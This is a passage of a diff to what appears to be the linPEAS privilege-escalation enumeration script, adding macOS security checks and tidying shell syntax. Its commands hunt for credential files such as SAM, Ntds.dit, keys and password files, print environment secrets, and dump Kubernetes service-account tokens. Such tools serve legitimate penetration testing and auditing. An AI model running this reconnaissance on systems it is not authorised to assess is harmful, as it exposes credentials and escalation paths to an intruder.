grep -E "roundcube$" | sort | uniq | head -n 70) + PSTORAGE_PASSBOLT=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "passbolt\.php$" | sort | uniq | head -n 70) + PSTORAGE_WGET=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "\.wgetrc$" | sort | uniq | head -n 70) + PSTORAGE_INTERESTING_LOGS=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "access\.log$|error\.log$" | sort | uniq | head -n 70) + PSTORAGE_OTHER_INTERESTING_FILES=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "\.bashrc$|\.google_authenticator$|hosts\.equiv$|\.lesshst$|\.plan$|\.profile$|\.recently-used\.xbel$|\.rhosts$|\.sudo_as_admin_successful$" | sort | uniq | head -n 70) + PSTORAGE_WINDOWS_FILES=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "unattend\.inf$|.*\.rdg$|AppEvent\.Evt$|ConsoleHost_history\.txt$|FreeSSHDservice\.ini$|NetSetup\.log$|Ntds\.dit$|protecteduserkey\.bin$|RDCMan\.settings$|SAM$|SYSTEM$|SecEvent\.Evt$|appcmd\.exe$|bash\.exe$|datasources\.xml$|default\.sav$|drives\.xml$|groups\.xml$|https-xampp\.conf$|https\.conf$|iis6\.log$|index\.dat$|my\.cnf$|my\.ini$|ntuser\.dat$|pagefile\.sys$|php\.ini$|printers\.xml$|recentservers\.xml$|scclient\.exe$|scheduledtasks\.xml$|security\.sav$|server\.xml$|setupinfo$|setupinfo\.bak$|sitemanager\.xml$|sites\.ini$|software$|software\.sav$|sysprep\.inf$|sysprep\.xml$|system\.sav$|unattend\.txt$|unattend\.xml$|unattended\.xml$|wcx_ftp\.ini$|ws_ftp\.ini$|web.*\.config$|winscp\.ini$|wsl\.exe$" | sort | uniq | head -n 70) + PSTORAGE_DATABASE=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -v -E '/man/|/usr/|/var/cache/' | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E ".*\.db$|.*\.sqlite$|.*\.sqlite3$" | sort | uniq | head -n 70) + PSTORAGE_BACKUPS=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "backup$|backups$" | sort | uniq | head -n 70) + PSTORAGE_PASSWORD_FILES=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E ".*password.*$|.*credential.*$|creds.*$|.*\.key$" | sort | uniq | head -n 70) ##### POST SERACH VARIABLES ##### - backup_folders_row="`echo $PSTORAGE_BACKUPS | tr '\n' ' '`" + backup_folders_row="$(echo $PSTORAGE_BACKUPS | tr '\n' ' ')" printf ${YELLOW}"DONE\n"$NC echo "" fi -if [ "`echo $CHECKS | grep SysI`" ]; then +if echo $CHECKS | grep -q SysI; then ########################################### #-------------) System Info (-------------# ########################################### @@ -1187,12 +1238,15 @@ if [ "`echo $CHECKS | grep SysI`" ]; then print_2title "Operative system" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits" (cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED}," - lsb_release -a 2>/dev/null + warn_exec lsb_release -a 2>/dev/null + if [ "$MACPEAS" ]; then + warn_exec system_profiler SPSoftwareDataType + fi echo "" #-- SY) Sudo print_2title "Sudo version" - if [ "`command -v sudo 2>/dev/null`" ]; then + if [ "$(command -v sudo 2>/dev/null)" ]; then print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version" sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED}," else echo_not_found "sudo" @@ -1211,7 +1265,7 @@ if [ "`echo $CHECKS | grep SysI`" ]; then pc_length=${#pc_version} pc_major=$(echo "$pc_version" | cut -d. -f1) pc_minor=$(echo "$pc_version" | cut -d. -f2) - if [ $pc_length -eq 4 -a $pc_major -eq 0 -a $pc_minor -lt 21 ]; then + if [ "$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor" -lt 21 ]; then echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED}," fi fi @@ -1221,46 +1275,57 @@ if [ "`echo $CHECKS | grep SysI`" ]; then #-- SY) PATH print_2title "PATH" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses" - echo $OLDPATH 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" + echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${SED_RED_YELLOW},g" echo "" #-- SY) Date - print_2title "Date" - date 2>/dev/null || echo_not_found "date" + print_2title "Date & uptime" + warn_exec date 2>/dev/null + warn_exec uptime 2>/dev/null echo "" #-- SY) System stats print_2title "System stats" (df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk" - free 2>/dev/null || echo_not_found "free" + warn_exec free 2>/dev/null echo "" #-- SY) CPU info print_2title "CPU info" - lscpu 2>/dev/null || echo_not_found "lscpu" + warn_exec lscpu 2>/dev/null echo "" #-- SY) Environment vars print_2title "Environment" print_info "Any private information inside environment variables?" - (env || set) 2>/dev/null | grep -v "RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|sudocapsB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY],${SED_RED},g" || echo_not_found "env || set" + (env || printenv || set) 2>/dev/null | grep -v "RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY],${SED_RED},g" || echo_not_found "env || set" echo "" #-- SY) Dmesg print_2title "Searching Signature verification failed in dmseg" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed" - (dmesg 2>/dev/null | grep "signature") || echo_not_found + (dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg" echo "" + #-- SY) Kernel extensions + if [ "$MACPEAS" ]; then + print_2title "Kernel Extensions not belonging to apple" + kextstat 2>/dev/null | grep -Ev " com.apple." + + print_2title "Unsigned Kernel Extensions" + macosNotSigned /Library/Extensions + macosNotSigned /System/Library/Extensions + fi + #-- SY) AppArmor - print_2title "Linux Protections" + print_2title "Protections" print_list "AppArmor enabled? .............. "$NC - if [ `command -v aa-status 2>/dev/null` ]; then + if [ "$(command -v aa-status 2>/dev/null)" ]; then aa-status 2>&1 | sed "s,disabled,${SED_RED}," - elif [ `command -v apparmor_status 2>/dev/null` ]; then + elif [ "$(command -v apparmor_status 2>/dev/null)" ]; then apparmor_status 2>&1 | sed "s,disabled,${SED_RED}," - elif [ `ls -d /etc/apparmor* 2>/dev/null` ]; then + elif [ "$(ls -d /etc/apparmor* 2>/dev/null)" ]; then ls -d /etc/apparmor* else echo_not_found "AppArmor" @@ -1268,7 +1333,7 @@ if [ "`echo $CHECKS | grep SysI`" ]; then #-- SY) grsecurity print_list "grsecurity present? ............ "$NC - ((uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity") + ( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity") #-- SY) PaX print_list "PaX bins present? .............. "$NC @@ -1282,9 +1347,30 @@ if [ "`echo $CHECKS | grep SysI`" ]; then print_list "SELinux enabled? ............... "$NC (sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," + #-- SY) Gatekeeper + if [ "$MACPEAS" ]; then + print_list "Gatekeeper enabled? .......... "$NC + (spctl --status 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," + + print_list "sleepimage encrypted? ........ "$NC + (sysctl vm.swapusage | grep "encrypted" | sed "s,encrypted,${SED_GREEN},") || echo_no + + print_list "XProtect? .................... "$NC + (system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5 | grep -Iv "^$") || echo_no + + print_list "SIP enabled? ................. "$NC + csrutil status | sed "s,enabled,${SED_GREEN}," | sed "s,disabled,${SED_RED}," || echo_no + + print_list "Connected to JAMF? ........... "$NC + warn_exec jamf checkJSSConnection + + print_list "Connected to AD? ............. "$NC + dsconfigad -show && echo "" || echo_no + fi + #-- SY) ASLR print_list "Is ASLR enabled? ............... "$NC - ASLR=`cat /proc/sys/kernel/randomize_va_space 2>/dev/null` + ASLR=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null) if [ -z "$ASLR" ]; then echo_not_found "/proc/sys/kernel/randomize_va_space"; else @@ -1294,14 +1380,14 @@ if [ "`echo $CHECKS | grep SysI`" ]; then #-- SY) Printer print_list "Printer? ....................... "$NC - lpstat -a 2>/dev/null || echo_not_found "lpstat" + (lpstat -a || system_profiler SPPrintersDataType || echo_no) 2>/dev/null #-- SY) Running in a virtual environment print_list "Is this a virtual machine? ..... "$NC - hypervisorflag=`cat /proc/cpuinfo 2>/dev/null | grep flags | grep hypervisor` - if [ `command -v systemd-detect-virt 2>/dev/null` ]; then - detectedvirt=`systemd-detect-virt` - if [ "$hypervisorflag" ]; then printf $RED"Yes ("$detectedvirt")"$NC; else printf $GREEN"No"$NC; fi + hypervisorflag=$(grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor) + if [ "$(command -v systemd-detect-virt 2>/dev/null)" ]; then + detectedvirt=$(systemd-detect-virt) + if [ "$hypervisorflag" ]; then printf $RED"Yes ($detectedvirt)"$NC; else printf $GREEN"No"$NC; fi else if [ "$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi fi @@ -1311,7 +1397,7 @@ if [ "`echo $CHECKS | grep SysI`" ]; then fi -if [ "`echo $CHECKS | grep Container`" ]; then +if echo $CHECKS | grep -q Container; then ############################################## #---------------) Containers (---------------# ############################################## @@ -1319,17 +1405,17 @@ if [ "`echo $CHECKS | grep Container`" ]; then containerCheck print_2title "Container related tools present" - command -v $CONTAINER_CMDS + command -v "$CONTAINER_CMDS" print_2title "Container details" print_list "Is this a container? ...........$NC $containerType" print_list "Any running containers? ........ "$NC # Get counts of running containers for each platform - dockercontainers=`docker ps --format "{{.Names}}" 2>/dev/null | wc -l` - podmancontainers=`podman ps --format "{{.Names}}" 2>/dev/null | wc -l` - lxccontainers=`lxc list -c n --format csv 2>/dev/null | wc -l` - rktcontainers=`rkt list 2>/dev/null | tail -n +2 | wc -l` + dockercontainers=$(docker ps --format "{{.Names}}" 2>/dev/null | wc -l) + podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l) + lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l) + rktcontainers=$(rkt list 2>/dev/null | tail -n +2 | wc -l) if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then echo_no else @@ -1347,7 +1433,7 @@ if [ "`echo $CHECKS | grep Container`" ]; then fi #If docker - if [ "`echo \"$containerType\" | grep -i \"docker\"`" ]; then + if echo "$containerType" | grep -qi "docker"; then print_2title "Docker Container details" inDockerGroup print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," @@ -1361,19 +1447,23 @@ if [ "`echo $CHECKS | grep Container`" ]; then checkDockerRootless print_list "Rootless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN}," fi + if df -h | grep docker; then + print_2title "Docker Overlays" + df -h | grep docker + fi fi if [ "$inContainer" ]; then echo "" print_2title "Container & breakout enumeration" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout" - print_list "Container ID ...................$NC" `cat /etc/hostname` - if [ "`echo \"$containerType\" | grep -i \"docker\"`" ]; then - print_list "Container Full ID ..............$NC `basename \"$(cat /proc/1/cpuset)\"`\n" + print_list "Container ID ...................$NC $(cat /etc/hostname)" + if echo "$containerType" | grep -qi "docker"; then + print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n" fi - if [ "`echo \"$containerType\" | grep -i \"kubernetes\"`" ]; then - print_list "Kubernetes namespace ...........$NC `cat /run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null`\n" - print_list "Kubernetes token ...............$NC `cat /run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null`\n" + if echo "$containerType" | grep -qi "kubernetes"; then + print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n" + print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n" fi checkContainerExploits @@ -1411,7 +1501,7 @@ fi -if [ "`echo $CHECKS | grep Devs`" ]; then +if echo $CHECKS | grep -q Devs; then ########################################### #---------------) Devices (---------------# ########################################### @@ -1426,17 +1516,25 @@ if [ "`echo $CHECKS | grep Devs`" ]; then print_2title "Unmounted file-system?" print_info "Check if you can mount umounted devices" if [ -f "/etc/fstab" ]; then - cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${SED_GREEN},g" | sed -${E} "s,$notmounted,${SED_RED}," | sed -${E} "s,$mounted,${SED_BLUE}," | sed -${E} "s,$Wfolders,${SED_RED}," | sed -${E} "s,$mountpermsB,${SED_RED},g" | sed -${E} "s,$mountpermsG,${SED_GREEN},g" + grep -v "^#" /etc/fstab 2>/dev/null | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${SED_GREEN},g" | sed -${E} "s,$notmounted,${SED_RED}," | sed -${E} "s,$mounted,${SED_BLUE}," | sed -${E} "s,$Wfolders,${SED_RED}," | sed -${E} "s,$mountpermsB,${SED_RED},g" | sed -${E} "s,$mountpermsG,${SED_GREEN},g" else echo_not_found "/etc/fstab" fi echo "" + + print_2title "Mounted disks information" + warn_exec diskutil list + echo "" + + print_2title "Mounted SMB Shares" + warn_exec smbutil statshares -a + echo "" echo "" if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi -if [ "`echo $CHECKS | grep AvaSof`" ]; then +if echo $CHECKS | grep -q AvaSof; then ########################################### #---------) Available Software (----------# ########################################### @@ -1444,19 +1542,53 @@ if [ "`echo $CHECKS | grep AvaSof`" ]; then #-- 1AS) Useful software print_2title "Useful software" - command -v $CONTAINER_CMDS nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch ctr 2>/dev/null + command -v "$CONTAINER_CMDS" nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch ctr authbind 2>/dev/null echo "" #-- 2AS) Search for compilers print_2title "Installed Compiler" (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/"); echo "" + + if [ "$(command -v pkg 2>/dev/null)" ]; then + print_2title "Vulnerable Packages" + pkg audit -F | sed -${E} "s,vulnerable,${SED_RED},g" + echo "" + fi + + if [ "$(command -v brew 2>/dev/null)" ]; then + print_2title "Brew Installed Packages" + brew list + echo "" + fi + + if [ "$MACPEAS" ]; then + print_2title "Writable Installed Applications" + system_profiler SPApplicationsDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do + if [ -w "$f" ]; then + echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" + fi + done + + system_profiler SPFrameworksDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do + if [ -w "$f" ]; then + echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" + fi + done + echo "" + + #Useless info + #print_2title "Developer Tools" + #system_profiler SPDeveloperToolsDataType + #echo "" + fi + echo "" if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi -if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then +if echo $CHECKS | grep -q ProCronSrvcsTmrsSocks; then #################################################### #-----) Processes & Cron & Services & Timers (-----# #################################################### @@ -1465,25 +1597,25 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then #-- PCS) Cleaned proccesses print_2title "Cleaned processes" if [ "$NOUSEPS" ]; then - printf ${BLUE}"[i] "$GREEN"Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC + printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC fi print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" if [ "$NOUSEPS" ]; then - print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," - pslist=`print_ps` + print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," + pslist=$(print_ps) else (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do - echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," - if [ "`command -v capsh`" ] && ! [ "`echo \"$psline\" | grep root`" ]; then - cpid="`echo \"$psline\" | awk '{print $2}'`" - caphex=0x"`cat \"/proc/$cpid/status\" 2> /dev/null | grep \"CapEff\" | awk '{print $2}'`" - if [ "$caphex" ] && [ "$caphex" != "0x" ] && [ "`echo \"$caphex\" | grep -v '0x0000000000000000'`" ]; then - printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | sed -${E} "s,$capsB,${SED_RED},g" + echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," + if [ "$(command -v capsh)" ] && ! echo "$psline" | grep -q root; then + cpid=$(echo "$psline" | awk '{print $2}') + caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')" + if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then + printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g" fi fi done - pslist=`ps auxwww` + pslist=$(ps auxwww) echo "" #-- PCS) Binary processes permissions @@ -1503,26 +1635,27 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then if ! [ "$IAMROOT" ]; then print_2title "Files opened by processes belonging to other users" print_info "This is usually empty because of the lack of privileges to read other user processes information" - lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," + lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} 